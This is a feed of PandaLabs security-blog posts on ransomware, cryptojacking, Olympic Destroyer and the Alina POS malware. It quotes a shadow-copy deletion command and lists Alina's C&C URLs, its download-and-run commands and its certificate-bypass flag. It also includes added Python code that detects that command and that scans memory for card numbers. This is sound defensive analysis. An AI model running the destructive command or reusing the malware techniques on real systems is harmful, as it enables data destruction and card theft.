PandaLabs - Panda Security Mediacenter
https://www.pandasecurity.com/en/mediacenter/pandalabs/
All the info about your cybersecurity. Feed last built Wed, 13 Sep 2023 13:36:58 +0000.

An analysis of Sodinikibi: The persistent ransomware as a service
https://www.pandasecurity.com/en/mediacenter/pandalabs/sodinikibi-ransomware-report/
Wed, 15 Jul 2020 06:57:09 +0000

In the case of Sodinokibi, one notable feature is its great ability to evade detection by antivirus systems and the measures it implements to achieve this.

The post An analysis of Sodinikibi: The persistent ransomware as a service appeared first on Panda Security Mediacenter.


If we take a look back, it is clear that one of the main features of ransomware as a threat is that it is continually reinventing itself, persisting in time and effectiveness. These types of attacks have evolved greatly since they first emerged, and today there are many different and varied families in existence.

This also implies a greater effort from cyber-criminals, as it involves the application of more advanced and complex techniques. In turn, this means an increase in the sophistication, propagation, and persistence of the threat. Sodinokibi, aka REvil, is one such example, having infected devices around the globe in a startlingly short period of time.

Download here the Ransomware Report

Sodinokibi and doxing

In late 2019, a trend emerged in ransomware attacks that has since become established practice: in addition to hijacking files, the operators of various ransomware families threaten to divulge confidential or compromising information.

The technique was first used with the Maze ransomware, and a month later the operators behind other families of ransomware – no doubt motivated by its effectiveness – adopted this strategy in cases where victims were reluctant to pay to recover encrypted files. Such was the case with the Sodinokibi, DoppelPaymer, RobinHood, and Nemty ransomware threats.

Main features

In the case of Sodinokibi (aka REvil), one notable feature is its great ability to evade detection by antivirus systems and the numerous measures it implements to achieve this. We have also noted how this ransomware exploits a vulnerability in Oracle WebLogic servers. Beyond this standout feature, Sodinokibi, like many other ransomware families, operates as RaaS (Ransomware as a Service), meaning that it generates money not only directly through extortion, but also through the sale of kits that allow attackers to create and distribute their own ransomware.

These features combined are what made Sodinokibi the most lucrative ransomware in the final quarter of last year, despite having first been detected earlier in the year, generating almost eight per cent more revenue than the Ryuk ransomware.

Infection vector

The most frequent way for Sodinokibi to reach devices is through a malicious email in a phishing campaign. The email contains a link prompting recipients to download a zip file containing the Sodinokibi loader. Attackers favor this route because it reaches the victim easily and because packaging the malware in a zip file helps it evade antivirus protection systems.

The zip file normally contains an obfuscated JavaScript file such as the one we analyzed in the report.

Distribution

[Figure: map-sodinokibi, map of recorded Sodinokibi incidents]

The geographical scope of Sodinokibi has been diverse, and incidents have been recorded in numerous countries around the world this year. Nevertheless, attacks have largely been focused on Europe, the USA, and India.


Advanced cyber-security to combat ransomware

We’ve witnessed how ransomware attacks have switched from targeting as many users as possible to focusing attacks on specific victims in order to improve financial returns. It is important, in the face of these new cyber-crime tactics, not to succumb and pay the ransom to these criminals, as there is no guarantee in any case that it will be possible to decrypt and retrieve the information even after handing over the money. Neither is it certain that any compromising information will not be made public, or used for any other malicious purposes.

To prevent your company from having to deal with such situations, there are advanced endpoint protection systems, such as Panda Adaptive Defense 360, with advanced EDR capabilities, process monitoring in all network endpoints, and a service for classifying 100 per cent of these processes. The truth is that ransomware is a very real threat and one that is difficult to counter if you don’t have the right protection or follow the proper guidelines.

Be prepared and protect your systems with Panda Adaptive Defense 360 which, thanks to the Zero Trust model, provides a greater level of visibility and control to boost prevention, detection, and response to any threat, including ransomware such as Sodinokibi.

Find out more about the technical details of Sodinokibi in our PandaLabs report on this ransomware:

Download here the Ransomware Report

Panda Security launches its Threat Insights Report 2020
https://www.pandasecurity.com/en/mediacenter/panda-security/threat-insights-report-2020/
Wed, 06 May 2020 08:12:21 +0000

Panda Security has published its Threat Insights Report 2020, where it analyzes the leading cybersecurity trends and cyberthreat activity.

The post Panda Security launches its Threat Insights Report 2020 appeared first on Panda Security Mediacenter.


The cybersecurity landscape never stops evolving, and both the scope and velocity of this evolution are increasing and becoming more unpredictable. Antivirus solutions based on specific signatures and generic and heuristic detection are not enough to be able to deal with the flood of new, highly sophisticated malware variants, which continue to infect the systems of companies with lower levels of protection.

Fortunately, as cyberthreats evolve, so too does cybersecurity technology. IT security solutions employ a range of capacities designed to keep networks from being infiltrated, to detect and stop suspicious behavior, and get ahead of future intrusions. In a new landscape with endless unknowns, what should cybersecurity look like in a changing environment?

At PandaLabs, Panda Security’s security laboratory, we registered and analyzed 14.9 million malware events in 2019, stopped 7.9 million potentially unwanted programs (PUPs), and handled 76,000 alerts for exploits that attempted to leverage vulnerabilities in applications, networks, or hardware. We compiled these data into the main cybersecurity threats and trends in our report. Discover the leading cybercriminal techniques and what you can do to stop them.

Download the report

This data reinforces the idea behind our cybersecurity model: reactive security is no longer appropriate. There are too many threats and too many attack vectors in any IT environment, all of which can cause a breach. Today, cybersecurity solutions must be predictive, proactive, and prepared to respond to any incident that could arise. 

The main cybersecurity technology trends in Q1 2020

Cybercriminals are increasingly stealthy, eagerly taking advantage of errors, hiding their movements, and getting around detection technologies, especially in the cloud, through mobile applications, and on networks.

Cybercriminals are essentially after three things:

  • Financial gain, using ransomware to extort money from their victims in return for recovering their stolen information
  • Data, which can be sold on the dark web
  • Control of infrastructure, networks, or other important systems. This access is sold to influential entities, such as nation states, political groups, paramilitary factions, and others.

How do they manage to do this? Some of the main cyberthreats of the start of this year are:

  • Ransomware, the notorious malware variant, is still persistent. A single click is enough to paralyze an entire network, doing away with security controls and backups to make as big an impact as possible in the shortest possible time. Any kind of organization can fall victim to ransomware, as we saw just a few months ago in the wave of attacks that hit public and private institutions around the world.
  • Fileless attacks are a growing concern: they are more difficult to detect and make it easier for cybercriminals to attack stealthily. Cybercriminals are changing how they attack, and their strategies no longer necessarily need a specific file to break onto a network, as we have analyzed in the Living-off-the-Land attacks that we registered.
  • Proactive threat hunting is now an essential solution for recognizing abnormal and malicious behaviors that exploit trusted applications.
  • Cybersecurity solutions can no longer be based on one single technology: they require an approach based on layered technology, combined with a zero-trust posture to stop possible security breaches. These layered technologies provide an unparalleled level of control, visibility, and flexibility. This is what is needed in the dynamic war against unknown attackers. Certified solutions such as Panda Adaptive Defense determine whether devices are running trusted endpoint security applications.

There are increasing numbers of interconnected endpoints, from workstations to laptops and servers. All of these endpoints require an approach that combines advanced endpoint protection (EPP) and endpoint detection and response (EDR), based on a zero-trust security posture, backed by artificial intelligence. The application of these technologies to cybersecurity is a necessary change in how the industry addresses the problem of cyberthreats. It emphasizes the idea of goodware—known, registered, and classified processes that can run on the endpoint—ensuring that unknown and malicious processes cannot run.

Conclusions: the advantages of multilayer protection

The latest threats require a cybersecurity that has evolved from single technology solutions to multi-layer solutions that employ behavior-based monitoring, among other features, to eliminate persistent threats, fileless attacks, and other malicious activity.

This has resulted in a layered technology model combined with a zero-trust security posture that doesn’t let any unknown processes run on any endpoints on the network. This technology provides two main advantages:

  • Security teams do not have to run in-depth analyses of alerts. Having to run such analyses manually could mean having to employ more staff or leaving alerts unverified, leading to elevated security risks.
  • If a security team has to verify these alerts, their MTTD and MTTR (mean time to detect/respond) will be higher than ours. Delaying a decision even by a few minutes could seriously worsen the potential effects of an attacker or a data breach.

Discover all the advantages of the only solution on the market that classifies 100% of running processes on computers. You can also find out which countries have been worst hit by different malware families, as well as other data analyzed by PandaLabs, here:

Download the report

Ryuk: How the ransomware that attacks businesses works
https://www.pandasecurity.com/en/mediacenter/malware/ryuk-ransomware-attacks-businesses/
Wed, 15 Apr 2020 07:22:09 +0000

PandaLabs has written a report on Ryuk. Find out how this notorious ransomware attacks businesses, what its entry vectors are, and other technical details.

The post Ryuk: How the ransomware that attacks businesses works appeared first on Panda Security Mediacenter.


In 2019, ransomware was one of the key players of cybercrime. Companies and official organizations all around the world were hit by cyberattacks that used this kind of malware to encrypt their files and demand a ransom. These waves of ransomware used a range of variants to carry out the attacks. However, there is one variant that was used then, and that is still seen today, that made a name for itself because of how often it was used: Ryuk.

Ryuk is one of the most notorious ransomware variants of the last few years. Since it first appeared in summer 2018, it has garnered an impressive list of victims, especially in business environments, which are the primary focus of its attacks.

In mid-2019, a large number of important Spanish companies suffered serious attacks that made use of Ryuk to encrypt their systems. The companies affected were in a range of sectors and varied in size. They included Everis and several municipal governments.

Spain is not the only country to have suffered at the hands of this ransomware; the countries that have been worst hit by Ryuk are Germany, China, Algeria, and India. Over the last three years, Ryuk has affected millions of users, compromising vast amounts of data and causing significant economic losses.

How Ryuk works

Like other pieces of ransomware, once Ryuk has finished encrypting its victims’ files, it leaves a ransom note stating that, in order to recover their files, they need to make a payment in bitcoins to the address indicated in the note.

Download The Report

In the sample analyzed by Panda Security, Ryuk made its way onto the system via a remote connection established in an RDP attack. The attacker managed to log in remotely and, once logged in, created an executable from the sample.

Ryuk, like other pieces of malware, tries to stay on the system for as long as possible. One of the ways it does so is by creating executables and launching them covertly. To be able to encrypt its victim’s files, it also needs sufficient privileges. Generally speaking, Ryuk starts with a lateral movement or is launched by another piece of malware, such as Emotet or Trickbot, which are responsible for escalating privileges before handing off to the ransomware.

How to protect yourself against Ryuk

Ryuk has a litany of tricks to gain entry, gain persistence, and encrypt its victims’ files. As is the case with all ransomware, if you don’t have the proper protection and if you don’t follow the appropriate guidelines, this threat can be hard to contain.

Panda Security deals with this problem with a combination of advanced endpoint protection in its solution Panda Adaptive Defense, with its EDR capabilities, its monitoring of all endpoints on the system, and its 100% classification service. It is based on a zero-trust approach: any unknown process or application is blocked until it can be analyzed. This way, it is able to stop any threat before it can run, even the most advanced attacks, like Ryuk.

Find out more technical details about Ryuk in our report on this ransomware, written by PandaLabs:

Download The Report

PandaLabs presents its cybersecurity predictions for 2019
https://www.pandasecurity.com/en/mediacenter/pandalabs/annual-cybersecurity-report-2018/
Mon, 17 Dec 2018 09:34:54 +0000

2017 was the year when the word ransomware stopped being a term exclusive to cybersecurity experts and IT departments. The enormous media attention that attacks…

The post PandaLabs presents its cybersecurity predictions for 2019 appeared first on Panda Security Mediacenter.


2017 was the year when the word ransomware stopped being a term exclusive to cybersecurity experts and IT departments. The enormous media attention that attacks such as WannaCry and Petya/GoldenEye received turned this type of threat into one of the key trends for businesses last year. However, highly publicized events must never serve as a risk indicator, nor influence any security-related decision.

Download the report

This year, the constant evolution of cybercriminality hasn’t taken a break. Cybercriminals have already begun to change their tactics: instead of attention-grabbing, showy attacks like those we saw last year, they are opting for sneakier tactics such as cryptojacking.

Cryptojacking, one of 2018’s booming trends, is the unauthorized use of a user’s devices to mine cryptocurrencies, and can get in via phishing emails, malicious URLs, or through vulnerabilities. Its aim is to go unnoticed for as long as possible, and thus fully exploit its victim’s processing power.

The year of personal data

One news story that has affected many cybersecurity professionals is the definitive implementation of the GDPR in May this year, something that had repercussions in nearly the whole world.

And the fact is that this new regulation has coincided with some of the most massive data breaches in history: Marriott International, Exactis, or the notorious Facebook and Cambridge Analytica case.

This year’s 6 most important data breaches

What can we expect to see next year?

One of the leading trends in cybercriminality in 2019 will be live hacking. Although “traditional” types of malware, such as Trojans or worms, are still used frequently by attackers, new malwareless attack techniques will grow at a faster rate. This can be put down, on the one hand, to the increased difficulty of detecting them and, on the other, to the increased cyberoffensive capacity in the world, both of states and of criminal gangs, whether state sponsored or unaffiliated.

In 2018, nation states have played a more significant role in the digital realm, as a consequence of the more protectionist positions in the western world (the United States and the United Kingdom), the reactions of other powers (mainly Russia and China), and the increasing climate of mutual distrust among them. One compelling prediction suggests that the concept of digital sovereignty will also spread to security in 2019, especially in Europe, moving towards a European digital sovereignty.

Find out all the main threat data from this year, together with the most important news, and all our predictions for 2019 in our PandaLabs Annual Report.

Download the report

Cryptojacking: A hidden cost for your company
https://www.pandasecurity.com/en/mediacenter/pandalabs/cryptojacking-a-hidden-cost/
Thu, 18 Oct 2018 07:30:47 +0000

We present our report on the trend that has become the leading threat to the security of electronic devices: cryptojacking.

The post Cryptojacking: A hidden cost for your company appeared first on Panda Security Mediacenter.


In 2018, cryptojacking has become the leading threat to the security of electronic devices. However, unlike other cybercriminal trends, it has done so without making headlines around the world. It could even be the case that you are being affected by it right now without noticing. But with a 4,000% increase at the start of the year, it is obvious that this is a serious threat, no matter how sneaky it is.

To keep cryptojacking from undermining your company’s reputation and putting your business’s continuity at risk, Panda Security presents the report, Cryptojacking: A hidden cost:

Download the whitepaper

What is it?

Cryptojacking is the unauthorized use of a user’s device to mine cryptocurrencies: attackers use malware to get onto computers, tablets or smartphones, and exploit part of their processing power to mine cryptocurrencies.

What effects does it have?

This attack has multiple negative consequences, which can include an extreme rise in your electricity bill, a serious slowdown in your computers, and even physical damage to devices.

To protect you from this threat, here at Panda Security we have the following tips:

  • Carry out periodic risk evaluations to identify vulnerabilities.
  • Analyze resource usage to make sure there is no unusual activity.
  • Thoroughly investigate any spikes in IT problems related to unusual CPU performance.
  • Be careful with your browser. If you suspect that cryptojacking is getting in via websites, install plugins to block these sites in your browser.
  • Regularly update all the company’s devices and systems.
  • Use an advanced cybersecurity solution that provides key characteristics such as detailed visibility of the activity on all endpoints and lets you control all running processes. This is exactly what Panda Adaptive Defense does.

Find out more in the report A Hidden Cost, and don’t become the next victim.

Download the whitepaper

Cyber Sabotage at the Winter Olympics
https://www.pandasecurity.com/en/mediacenter/pandalabs/cyber-sabotage-winter-olympics/
Thu, 15 Feb 2018 14:05:19 +0000

While spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, the organizing committee was busy dealing with a cyberattack.

The post Cyber Sabotage at the Winter Olympics appeared first on Panda Security Mediacenter.


On Monday, while spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, held in Pyeongchang, the Olympics organizing committee was busy dealing with a cyberattack.

The decline in new malware samples and the professionalization of attacks on networks are setting new standards in cybersecurity. In this case, we’re dealing with a targeted attack and an act of sabotage, in which hackers sought to cause chaos during the opening ceremony. It affected some television and internet services before the ceremony, but was not successful in stealing data from servers.

Researchers from Cisco’s Talos division also added that the malware’s purpose was not theft, but rather destruction.

GoldDragon, the latest Russian hack?

With the focus usually centered on maximum profit, there’s been an increase in the number of advanced infiltrations using sharp new tactics, such as malwareless attacks and the abuse of non-malicious tools.

PandaLabs explains that by not using malware, which is easily detected by advanced cybersecurity tools, attackers assume the identity of the administrator after having obtained their network credentials. They warn that the techniques used by cybercriminals to attack without using malware can be highly varied, taking advantage of all kinds of non-malicious tools that are part of the day to day of IT managers.

In this case, the attack did in fact use malware (named GoldDragon), but to carry out certain actions it used non-malicious tools such as PsExec or the CMD itself. In this way, it was able to execute processes on other computers connected to the network without raising suspicion and without using a version modified by the attackers, but rather the official version.

To carry out its destructive actions, it launched system commands from a command window (cmd). Instructions looked like this:

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Here, vssadmin.exe is used to silently delete the Volume Shadow Copies, the backup copies created by the operating system, so that files cannot be restored from them.
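As an added example (not part of the PandaLabs post), the following Python shows how a defender might flag this exact behaviour in process-creation telemetry: it normalises command lines so that the cmd.exe /c wrapper, full paths, quoting and casing do not hide the vssadmin delete shadows invocation, and marks events whose parent is the PsExec service. The log records, host names and field names are constructed, loosely modelled on Sysmon process-creation events.

```python
"""Flag Volume Shadow Copy deletion in process-creation logs.

Added example, not code from the PandaLabs post. The events below are
constructed (hypothetical hosts and paths), loosely modelled on the
Image / CommandLine / ParentImage fields of Sysmon process-creation events.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcessEvent:
    host: str
    image: str          # executable that was started
    command_line: str   # full command line as logged
    parent_image: str   # executable that started it


@dataclass
class Alert:
    host: str
    rule: str
    via_psexec: bool    # parent is the PsExec service, i.e. remote execution
    command_line: str


def _normalise(token: str) -> str:
    """Lower-case a token and reduce a full Windows path to the bare program
    name (e.g. 'vssadmin'). Switches such as /all are left untouched."""
    token = token.lower()
    if "\\" in token:
        token = token.rsplit("\\", 1)[-1]
    if token.endswith(".exe"):
        token = token[:-4]
    return token


def _tokens(command_line: str) -> List[str]:
    # Quotes are dropped rather than parsed: a quoted argument such as
    # "vssadmin delete shadows /all" must still yield its individual words.
    return [_normalise(t) for t in command_line.replace('"', " ").split()]


def detect_shadow_deletion(event: ProcessEvent) -> Optional[str]:
    """Return a rule name if the command line deletes shadow copies via vssadmin.

    Matching is done on the command line, not on Image, because the Olympic
    Destroyer sample wrapped the call in cmd.exe /c, so Image is cmd.exe.
    """
    toks = _tokens(event.command_line)
    for i, tok in enumerate(toks):
        if tok == "vssadmin":
            # Order-independent: "delete shadows /quiet /all" and
            # "delete shadows /for=C: /oldest" both destroy backups.
            args = set(toks[i + 1:])
            if {"delete", "shadows"} <= args:
                return "vssadmin_delete_shadows"
    return None


def scan(events: List[ProcessEvent]) -> List[Alert]:
    alerts = []
    for ev in events:
        rule = detect_shadow_deletion(ev)
        if rule:
            alerts.append(Alert(
                host=ev.host,
                rule=rule,
                via_psexec=_normalise(ev.parent_image) == "psexesvc",
                command_line=ev.command_line,
            ))
    return alerts


# Constructed sample telemetry. ws-01 mirrors the command quoted in the post,
# launched through PsExec's service; ws-03 is a benign listing and must not fire.
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", r"C:\Windows\system32\cmd.exe",
                 r"C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet",
                 r"C:\Windows\PSEXESVC.exe"),
    ProcessEvent("ws-02", r"C:\Windows\system32\vssadmin.exe",
                 "VSSADMIN.EXE Delete Shadows /Quiet /All",
                 r"C:\Windows\system32\cmd.exe"),
    ProcessEvent("ws-03", r"C:\Windows\system32\vssadmin.exe",
                 "vssadmin.exe list shadows",
                 r"C:\Windows\system32\cmd.exe"),
    ProcessEvent("ws-04", r"C:\Windows\system32\cmd.exe",
                 'cmd.exe /c "vssadmin delete shadows /for=C: /oldest"',
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.host}: {a.rule} (via PsExec: {a.via_psexec}) <- {a.command_line}")
```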

Everything seems to indicate that the attack came from Russia. Ukrainian intelligence and a CIA report linked NotPetya and BadRabbit to Russian intelligence, and in the case of GoldDragon (also called Olympic Destroyer), all signs point to a more refined version of BadRabbit.

System tools as a new attack vector

Monitoring the execution of all processes on company workstations and servers is essential to avoiding close calls like the one we witnessed at this year’s Winter Olympics.

Traditional antivirus products are not able to detect these types of attack, nor to remediate them. Panda Adaptive Defense, however, proposes a new security model based on monitoring, controlling, and classifying the behavior and nature of every application in execution, in order to offer robust and complete protection.

PandaLabs recommends the use of advanced cybersecurity solutions such as Panda Adaptive Defense, which also allow the client’s existing infrastructure to coexist with traditional antivirus systems and integrate with existing SIEM solutions.

Compilation of PandaLabs Reports
https://www.pandasecurity.com/en/mediacenter/pandalabs/pandalabs-compilation/
Sun, 17 Dec 2017 08:00:56 +0000

The following is a compilation of all past PandaLabs reports. It is a complete record of the cybersecurity lab's highlights.

The post Compilation of PandaLabs Reports appeared first on Panda Security Mediacenter.



2017

Q1 Report #WannaCry Report Q2 Report Annual Report

2016

Q1 Report Q2 Report Q3 Report Annual Report

2015

Q1 Report Q2 Report Q3 Report Annual Report

2014

Q1 Report Q2 Report Q3 Report Annual Report

2013

Q1 Report Q2 Report Q3 Report Annual Report

2012

Q1 Report Q2 Report Q3 Report Annual Report

2011

Q1 Report Q2 Report Q3 Report Annual Report

2010

Q1 Report Q2 Report Q3 Report Annual Report

PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018
https://www.pandasecurity.com/en/mediacenter/pandalabs/annual-report-cybersecurity-predictions-2018/
Thu, 23 Nov 2017 10:11:06 +0000

PandaLabs neutralized an average of 285,000 malware samples a day in 2017. Read the laboratory's annual report and predictions for what's in store in 2018.

The post PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018 appeared first on Panda Security Mediacenter.


Today, more malware samples are created in just a few hours than in the entire twentieth century. The targets have changed, the techniques have become more sophisticated, the attack vectors have multiplied, and the tools are more precisely designed. Attackers are meticulously studying their victims to adapt their strategy and achieve the greatest possible impact.


Their efficiency, effectiveness, and profitability are proven time and again, with up to 75 million distinct malware files created between the beginning of the year and October, which translates to 285,000 new samples detected every day by PandaLabs.

2017 Cybersecurity Trends

More than half of attacks are motivated by financial targets, while espionage is the second greatest motivating factor.

Stealth attacks with adaptive lateral movements are becoming all too common.

Malwareless attacks are increasingly favored by attackers. They prefer to remain invisible to traditional protection models, and do not require the victim’s interaction. These attacks can double profitability when optimally executed.

Tools for exploiting vulnerabilities have given rise to new attack vectors that require no human interaction.

The endpoint is the target. The perimeter has become blurred, mobility is the norm in any company, and corporate networks are therefore much more exposed.

Ex-employees attempted to extort their previous companies, initiating attacks from within the company.

There was a larger presence of organized cybercriminal groups, such as the Lazarus Group, attacking the media, the aerospace and financial sectors, as well as critical infrastructures in the US and elsewhere.

Cyberwarfare and cyber-armies: in a full on arms race in cyberspace, nations are creating cyber command centers to bolster defenses against attacks on companies and infrastructures.

Figures

In 2017, PandaLabs analyzed and neutralized a total of 75 million malware files, about 285,000 new samples a day.

One thing is clear: there are many more malware samples, and each of them is infecting fewer devices individually. Each malware sample will attack a minimum number of devices in order to lower the risk of being detected and thereby achieve its goal.

This is supported by the fact that of the new malware (PE files) never seen before this year (15,107,232 samples), 99.10% (14,972,010 samples) were seen only once. Looked at from the other end, only an insignificant fraction of all malware is truly widespread: just 989 malware files (0.01%) were seen on more than 1,000 computers.

This confirms what we already knew: with a few exceptions, such as WannaCry or the CCleaner hack, most malware changes every time it infects, so each copy has a very limited distribution.

Listen to the webinar given by Luis Corrons, Technical Director of PandaLabs:

Cybersecurity Predictions for 2018

Cyberwarfare and its consequences: Instead of an open war where the opposing sides are clearly identifiable, we are facing a guerrilla strategy with isolated attacks whose authors are never clear. Freelancers at the service of the highest bidder, false flag operations, and an increase in collateral victims of these attacks is what’s in store for 2018.

Malwareless hacking attacks: attacks that abuse non-malicious tools or compromised applications to carry out their efforts will increase.

Malware for mobile devices and the Internet of Things will continue to rise. In general, IoT devices are not targeted by cybercriminals as the ultimate goal. But when compromised, these devices increase the attack surface and are used as a gateway to the company’s network.

More advanced attacks and more ransomware can be expected in the coming year. These attacks promise a high return on their investment at a low level of risk.

Companies will lead the way in raising awareness of attacks: thanks to the new GDPR legislation, for the first time in history the public will learn of attacks that happen and that, in many cases, were previously covered up.

Social networks and propaganda: there will be an increase in fake news due to the ability of these platforms to influence public opinion. Facebook, the largest social network in the world, is already taking action on the matter. If it is discovered that a Facebook page repeatedly distributes false news, it will prohibit it from being publicized on the social network.

Cryptocurrency: the use of cryptocurrencies will continue to grow, and all the cybercrime that surrounds it, such as infecting computers with cryptocurrency mining software or the theft of user wallets, will follow suit.

Conclusions

Security update protocols should be a priority at all companies. Cases such as WannaCry or Equifax reaffirm this, as every day that passes without patching a vulnerable system puts the company at risk, as well as the integrity of its data, including that of customers and suppliers. Production can be endangered and incur millions in losses.

Countries are investing more and more in defensive and offensive capabilities, with a focus on critical infrastructures.

2018 augurs a more dangerous situation. For many professionals, a change of mentality (and strategy) will be necessary to achieve the highest levels of security and protect the assets of their companies’ networks.

Both in business and at home, training and awareness are key. It follows that cybersecurity, often forgotten by management, will require a greater investment.

Having in-depth knowledge of attacks and what they consist of should be the basis for a good defensive strategy. Machine Learning tools and the investigations of Threat Hunting teams are essential to avoid future intrusions.

Signature files no longer work and the figures speak for themselves: more than 99% of all malware never appears again anywhere else.

There is a problem of focus: solutions that remain focused on fighting against malware (the majority of those available on the market) are doomed to become extinct if they do not change their strategy.

And of course, we can’t forget international cooperation and the creation of common legislative frameworks such as the GDPR. Having political and economic support and a plan of action will make it possible to benefit from the latest technological advances in the safest manner.

In the PandaLabs Annual Report, you can learn about real cases, review the most discussed attacks of 2017, and read more about what lies ahead in 2018.

Alina, the Latest POS Malware https://www.pandasecurity.com/en/mediacenter/pandalabs/alina-pos-malware/ https://www.pandasecurity.com/en/mediacenter/pandalabs/alina-pos-malware/#comments Tue, 14 Nov 2017 11:07:27 +0000 https://www.pandasecurity.com/en/mediacenter/?p=20142

Alina is the latest POS malware discovered by PandaLabs. Attacks on POS terminals are still very popular, especially in countries like the United States.


The danger of having the data of thousands of credit cards recorded makes Point of Sale (POS) terminals a critical system, as well as an increasingly sought-after target of cybercrime. Attacking these devices anonymously online is relatively straightforward, and selling the data on the black market is profitable.

We’ve recently detected infections at a significant number of bars and restaurants in the United States whose POS terminals were attacked by two variants of credit card theft malware.

The malware samples that we’ll be analyzing are the following:

File name     MD5
Epson.exe     69E361AC1C3F7BCCE844DE43310E5259
Wnhelp.exe    D4A646841663AAC2C35AAB69BEB9CFB3

Epson.exe presents an invalid certificate:

Both samples were compiled with Microsoft Visual C++ 8, and are neither packed nor encrypted. Once the malware is executed on the system, it proceeds to analyze the different system processes in search of credit card data.

Here we can see how they go through the different processes looking only for those that can contain credit cards in memory:

In the case of the “Epson.exe” sample, it will search for credit cards in the following processes:

Program name Description           
notepad++.exe Text editor
CreditCardService.exe Microsoft
DSICardnetIP_Term.exe NETePay for Mercury
DSIMercuryIP_Dial.exe NETePay for Mercury
EdcSvr.exe Aloha Electronic Draft Capture (EDC)
fpos.exe Future POS
mxSlipStream4 / mxSlipStream5 / mxSlipStream.exe / mxSwipeSVC.exe SlipStream POS System Transaction Processor by mXpress
NisSrv.exe Windows 8
spcwin.exe/ Spcwin.exe / SPCWIN.exe /SPCWIN.EXE POSitouch (Food Service Industry POS System)

On the other hand, the “Wnhelp.exe” sample contains a list that is used to discard the processes to be analyzed. If the process name coincides with any item on the list, it will not be analyzed in the search for credit cards:

Discarded processes:

  • explorer.exe
  • chrome.exe
  • firefox.exe
  • iexplore.exe
  • svchost.exe
  • smss.exe
  • csrss.exe
  • wininit.exe
  • steam.exe
  • devenv.exe
  • thunderbird.exe
  • skype.exe
  • pidgin.exe
  • services.exe
  • winlogon.exe
  • alg.exe
  • wscntfy.exe
  • taskmgr.exe
  • spoolsv.exe
  • QML.exe
  • AKW.exe
  • OneDrive.exe
  • VsHub.exe
  • Microsoft.VsHub.Server.HttpHost.exe
  • vcpkgsrv.exe
  • dwm.exe
  • dllhost.exe
  • jusched.exe
  • jucheck.exe
  • lsass.exe


In both samples, once a process to analyze has been selected, whether because it appears on the target list (as with Epson.exe) or because it does not appear on the exclusion list (as with Wnhelp.exe), the malware creates a new thread:

And will then proceed to analyze the memory using an algorithm specifically designed to check whether the found data is from credit cards:
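Added example (not PandaLabs code) of the kind of check described above: a buffer scanner that separates card numbers from other digit runs. The article does not name the samples' algorithm, so the Luhn checksum used here is an assumption; from the defender's side the same routine lets a responder confirm whether a dumped POS process actually held card data, or feeds a DLP rule. The sample memory slice is constructed.

```python
"""Added example (not PandaLabs code): scanning a byte buffer for card numbers.

The Luhn checksum is an assumption; the article only says the samples use an
algorithm that tells card numbers apart from other data found in memory.
"""
import re


def luhn_ok(digits: str) -> bool:
    """Return True if the decimal string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - 48
        if i % 2 == 1:  # double every second digit, counting from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


# Candidate: 13 to 19 decimal digits, optionally separated by single spaces or
# dashes, and not part of a longer digit run.
_CANDIDATE = re.compile(rb"(?<![0-9])(?:[0-9][ -]?){12,18}[0-9](?![0-9])")


def find_card_numbers(buf: bytes) -> list:
    """Return (offset, PAN) pairs for every Luhn-valid candidate in buf.

    Separators are stripped from the returned PAN; only ASCII digits are scanned.
    """
    hits = []
    for m in _CANDIDATE.finditer(buf):
        pan = re.sub(rb"[ -]", b"", m.group()).decode("ascii")
        if luhn_ok(pan):
            hits.append((m.start(), pan))
    return hits


# Constructed memory slice: one Luhn-valid test PAN, one 16-digit run that
# fails Luhn, a 14-digit timestamp and a phone number that must all be ignored.
SAMPLE_MEMORY = (b"order=42;amount=19.99;ts=20171114110727;"
                 b"pan=4111 1111 1111 1111;"
                 b"ref=4111111111111112;"
                 b"phone=555-0100")

if __name__ == "__main__":
    for off, pan in find_card_numbers(SAMPLE_MEMORY):
        # never log a full PAN: mask everything but the first six and last four
        print(f"offset {off}: {pan[:6]}{'*' * (len(pan) - 10)}{pan[-4:]}")
```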

The Wnhelp.exe sample is executed by the attackers with the command “install”, in such a way that it creates a service to ensure its persistence in the system:

The service is called “Windows Error Reporting Service Log”.

The sample Epson.exe works in the same way, although attackers can configure the name of the service as they want through parameters:

install [Service name] [Service description] [Third parameter]

Each variant connects to a different command and control (C&C) server:

Epson.exe    dropalien.com/wp-admin/gate1.php
Wnhelp.exe   www.rdvaer.com/wp-admin/gate1.php


They can then receive different orders from the attacker:

Commands Description
update = [URL] Malware update.
dlex = [URL] Downloads and runs file.
chk = [CRC_Checksum] Updates the file’s checksum.

To connect to the control panel, they use the following User-Agent:

“Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22”

The communication is carried out over SSL. The malware modifies the internet connection configuration to ignore unknown CAs (Certificate Authorities), thereby ensuring that it will be able to use its own certificate.

First it obtains the internet connection security flags through the InternetQueryOptionA API with the third argument set to the value INTERNET_OPTION_SECURITY_FLAGS (31). Once obtained, it performs a bitwise OR with the flag SECURITY_FLAG_IGNORE_UNKNOWN_CA (100h).

Conclusion: How to Confront a POS Attack

Attacks on POS terminals are still very popular, especially in countries like the United States where the use of Chip & PIN is not mandatory. Many of these attacks target businesses that do not have specialized personnel in computer science, much less in security, an oversight that attackers can take advantage of.

POS terminals are computers that handle critical data and therefore must be hardened to the maximum in order to shield customer data from the inherent risks. Solutions such as Adaptive Defense 360 help to ensure that no malicious process is executed on these terminals. There is no need to hire a security specialist, because the solution includes Panda Security’s own technicians, who are responsible for ensuring that all executed processes are safe.

